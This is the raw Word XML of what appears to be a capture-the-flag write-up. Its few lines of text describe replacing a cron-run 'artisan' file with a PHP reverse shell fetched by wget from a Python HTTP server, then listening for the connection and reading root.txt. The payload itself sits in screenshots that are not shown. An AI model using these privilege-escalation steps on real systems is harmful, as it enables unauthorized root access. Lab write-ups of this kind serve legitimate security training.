      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/artisan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F434B1" w14:textId="3FCFA4CC" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF1EAD2" wp14:editId="6A6BB2C1">
            <wp:extent cx="1514686" cy="514422"/>
            <wp:effectExtent l="76200" t="76200" r="123825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C2BCE" w14:textId="6C2B0A57" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a python http server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD83DB" w14:textId="4A389AB9" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894936E" w14:textId="7C7499FF" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70C1DFC1" wp14:editId="1DB57186">
            <wp:extent cx="3096057" cy="704948"/>
            <wp:effectExtent l="76200" t="76200" r="142875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67764" w14:textId="77777777" w:rsidR="000648BF" w:rsidRDefault="000648BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remove artisan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044BE6E" w14:textId="461FBCC8" w:rsidR="000648BF" w:rsidRDefault="000648BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFDC9D1" wp14:editId="67723308">
            <wp:extent cx="2543530" cy="314369"/>
            <wp:effectExtent l="76200" t="76200" r="12382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A2E61" w14:textId="4A6B3A5C" w:rsidR="000648BF" w:rsidRDefault="00D1477E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use WGET to retrieve file from python web sever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F955B3C" w14:textId="72E817D2" w:rsidR="00D1477E" w:rsidRDefault="00D1477E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1477E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE6C7CD" wp14:editId="48E9BB21">
            <wp:extent cx="4163006" cy="1790950"/>
            <wp:effectExtent l="76200" t="76200" r="14287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F6AE4" w14:textId="4D0EE7B1" w:rsidR="000648BF" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Listen to port stated in the reverse php shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB52A2" w14:textId="11080581" w:rsidR="00D1477E" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1477E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D5A4F2" wp14:editId="59258FBC">
            <wp:extent cx="2010056" cy="64779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70C" w14:textId="6B77FCC9" w:rsidR="00D1477E" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wait till the crontab to execute the artisan file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75299B42" w14:textId="5D0CD37F" w:rsidR="00D1477E" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1477E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3C1EC4" wp14:editId="237510A8">
            <wp:extent cx="5058481" cy="12574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081" w14:textId="2D824EF4" w:rsidR="00D1477E" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root file is under &gt; /home/root &gt; cat root.txt</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4D090858" w14:textId="59F7B2E3" w:rsidR="00D1477E" w:rsidRPr="000648BF" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1477E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E969CC3" wp14:editId="4308A6B4">
            <wp:extent cx="1438476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7E" w:rsidRPr="0006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BB"/>
    <w:rsid w:val="00025A57"/>
    <w:rsid w:val="00046C8C"/>
    <w:rsid w:val="00046D62"/>
    <w:rsid w:val="000648BF"/>
    <w:rsid w:val="000B23BB"/>
    <w:rsid w:val="001D412B"/>
    <w:rsid w:val="002C7E24"/>
    <w:rsid w:val="0041755F"/>
    <w:rsid w:val="004E34C6"/>
    <w:rsid w:val="00813B95"/>
    <w:rsid w:val="00A90252"/>
    <w:rsid w:val="00BF7A1E"/>
    <w:rsid w:val="00C71706"/>
    <w:rsid w:val="00C73F63"/>
    <w:rsid w:val="00D1477E"/>
    <w:rsid w:val="00E014EC"/>
    <w:rsid w:val="00E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D06B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E518573D-FBB6-45A0-B574-A164E0AD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7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hyperlink" Target="http://www.crony.zhal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2022-09-21T02:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-22T11:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>